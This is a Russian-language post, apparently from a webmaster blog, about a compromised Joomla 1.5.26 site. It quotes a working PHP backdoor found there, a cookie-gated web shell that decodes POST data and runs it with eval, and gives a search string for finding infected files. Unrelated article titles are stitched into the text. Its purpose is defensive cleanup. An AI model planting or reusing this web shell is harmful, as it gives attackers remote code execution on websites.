Статьи
Наш союзник Bikinika
Не открываются «Общие настройки»/Global Configuration (index.php?option=com_config) / Вопросы по Joomla / WMDN
Опубликовано: 04.11.2017
На днях столкнулся с такой проблемой на одном из старых сайтов на Joomla 1.5.26. Как оказалось решение этой проблемы заняло чуть более 5 минут.
Заранее скажу, что дело было во взломе, и далее буду примеры вредоносного кода, метод их поиска и общие выводы насчет безопасности.
Перерыв массу постов на форуме joomla.org, я пришел к выводу, что дело конечно же в турецких хакерах, и, соответственно стал искать их следы. Обычно зараженные файлы легко находятся с помощью Total Commander по подстроке @base64_decode(@str_replace (соответственно их впоследствии удобно удалить с помощью кнопки «Файлы на панель»).Krita: Окно настройки кистей, общие настройки
Так вот тут я приведу куски вредоносного кода, которые возможно еще кому-то помогут найти все вредоносные скрипты. У меня такие куски были примерно двух типов:
<?php if ( ! empty ( $_COOKIE [ '__utma' ] ) and substr ( $_COOKIE [ '__utma' ] , 0 , 16 ) == '3469825000034634' ) { if ( ! empty ( $_POST [ 'msg' ] ) and $msg =@ gzinflate ( @ base64_decode ( @ str_replace ( ' ' , '' , urldecode ( $_POST [ 'msg' ] ) ) ) ) ) { echo '<textarea id=areatext>' ; eval ( $msg ) ; echo '</textarea>bg' ; exit ; } } ?> |
в файлах с названиями типа таких 0bc11c.php/3716.php.
Общие настройки Youtube канала. Часть 1